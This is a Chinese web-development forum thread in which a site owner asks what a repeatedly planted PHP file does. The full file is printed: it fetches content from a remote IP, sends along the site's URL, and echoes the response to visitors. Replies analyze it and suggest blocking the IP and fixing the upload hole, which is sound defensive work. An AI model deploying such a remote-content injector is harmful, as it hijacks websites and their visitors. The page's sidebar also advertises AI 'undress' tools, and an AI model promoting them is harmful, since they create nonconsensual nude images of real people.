我网站好像被黑了,总有个SB天天来我网站根目录放一个文件,打开后代码如下:
set_time_limit(0);
header("Content-Type: text/html;charset=gb2312");
$Remote_server = "http://122.114.126.160/";
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
$userAgent = $_SERVER['HTTP_USER_AGENT'];
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name);
echo $Content_mb;
exit();
function getHTTPPage($url) {
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context);
if (empty($html)) {
exit("
Connection Error!
");}
return $html;
}
?>
这什么意图?求高手分析下
回复讨论(解决方案)
他把这个代码放到你根目录下,网站是不是访问不了?
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常)
好像是他把你网站 原始地址 传到他自己写的一个方法里面 用 host 参数接受 然后抓取你首页的信息吧
我网站没异常(我还没发现异常)
上面我的描述有问题,这个文件不是放在更目录,是放在根目录的上一个目录,如图:
public_html 这个目录里面是网站的根目录,他这个文件和public_html放在同一个目录,不知道他这样对我的网站有什么影响。 这SB隔天来次,已经删了几次了。
linux系统,目前权限设置为755,设置为644网站就打不开了,有什么办法不让他上次文件吗?
$Remote_server."/index.html?host=".$host_name 这个地方他把你的网站地址传过去 不知道干什么了 ,代码在那个ip的服务器上面 看不到。。。。。猜不来他要干什么。。。。。
服务器 那方面的我不懂,等高手来把,
谢谢你
没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("
Connection Error!
");}
return $html;
}
至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
没有异常?
set_time_limit(0); //永不超时
header("Content-Type: text/html;charset=gb2312"); //指定浏览器字符集
$Remote_server = "http://122.114.126.160/"; //远程网站
$host_name = "http://".$_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF']; //构造当前页的 url
$userAgent = $_SERVER['HTTP_USER_AGENT']; //获取浏览者的浏览器信息
$Content_mb=getHTTPPage($Remote_server."/index.html?host=".$host_name); //调用远程网站
echo $Content_mb; //输出远程网站返回内容
exit(); //退出程序运行
function getHTTPPage($url) { //调用远程网站函数
$opts = array(
'http'=>array(
'method'=>"GET",
'header'=>"User-Agent: aQ0O010O"
)
);
$context = stream_context_create($opts);
$html = @file_get_contents($url, false, $context); //访问远程网站,你的url也传过去了
if (empty($html)) {
exit("
Connection Error!
");}
return $html;
}
至于对方做了什么?目前尚不清楚
如果是在本地开发环境,返回的是广告,正常的页面没有了
如果是运行中的网站,那么若没异样的话,就说明潜在的威胁是很大的(CSRF攻击)
仅是出一点广告,倒是也无所谓
-------------------------
感谢
不管怎么样,先把对方的IP给禁掉吧,配置你的服务器:禁止122.114.126.160的IP访问你的网站。
-------------------------
感谢
把你页面的内容替换了。
先看看程序那里有漏洞让人上传文件比较好,漏洞不封以后还是很多问题的。
-------------------------
感谢
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
我猜测他是想放到你public_html文件夹下seo.php,如果有文件就是替换掉里面的文件
结果/打错了,变成还在外面的文件夹
谢谢 有可能

Laravel simplifies handling temporary session data using its intuitive flash methods. This is perfect for displaying brief messages, alerts, or notifications within your application. Data persists only for the subsequent request by default: $request-

The PHP Client URL (cURL) extension is a powerful tool for developers, enabling seamless interaction with remote servers and REST APIs. By leveraging libcurl, a well-respected multi-protocol file transfer library, PHP cURL facilitates efficient execution of various network protocols, including HTTP, HTTPS, and FTP. This extension offers granular control over HTTP requests, supports multiple concurrent operations, and provides built-in security features.

Laravel provides concise HTTP response simulation syntax, simplifying HTTP interaction testing. This approach significantly reduces code redundancy while making your test simulation more intuitive. The basic implementation provides a variety of response type shortcuts: use Illuminate\Support\Facades\Http; Http::fake([ 'google.com' => 'Hello World', 'github.com' => ['foo' => 'bar'], 'forge.laravel.com' =>

Do you want to provide real-time, instant solutions to your customers' most pressing problems? Live chat lets you have real-time conversations with customers and resolve their problems instantly. It allows you to provide faster service to your custom

Article discusses late static binding (LSB) in PHP, introduced in PHP 5.3, allowing runtime resolution of static method calls for more flexible inheritance.Main issue: LSB vs. traditional polymorphism; LSB's practical applications and potential perfo

PHP logging is essential for monitoring and debugging web applications, as well as capturing critical events, errors, and runtime behavior. It provides valuable insights into system performance, helps identify issues, and supports faster troubleshoot

Laravel simplifies HTTP verb handling in incoming requests, streamlining diverse operation management within your applications. The method() and isMethod() methods efficiently identify and validate request types. This feature is crucial for building

The Storage::download method of the Laravel framework provides a concise API for safely handling file downloads while managing abstractions of file storage. Here is an example of using Storage::download() in the example controller:


Hot AI Tools

Undresser.AI Undress
AI-powered app for creating realistic nude photos

AI Clothes Remover
Online AI tool for removing clothes from photos.

Undress AI Tool
Undress images for free

Clothoff.io
AI clothes remover

AI Hentai Generator
Generate AI Hentai for free.

Hot Article

Hot Tools

ZendStudio 13.5.1 Mac
Powerful PHP integrated development environment

Safe Exam Browser
Safe Exam Browser is a secure browser environment for taking online exams securely. This software turns any computer into a secure workstation. It controls access to any utility and prevents students from using unauthorized resources.

DVWA
Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is very vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, to help web developers better understand the process of securing web applications, and to help teachers/students teach/learn in a classroom environment Web application security. The goal of DVWA is to practice some of the most common web vulnerabilities through a simple and straightforward interface, with varying degrees of difficulty. Please note that this software

SublimeText3 English version
Recommended: Win version, supports code prompts!

VSCode Windows 64-bit Download
A free and powerful IDE editor launched by Microsoft
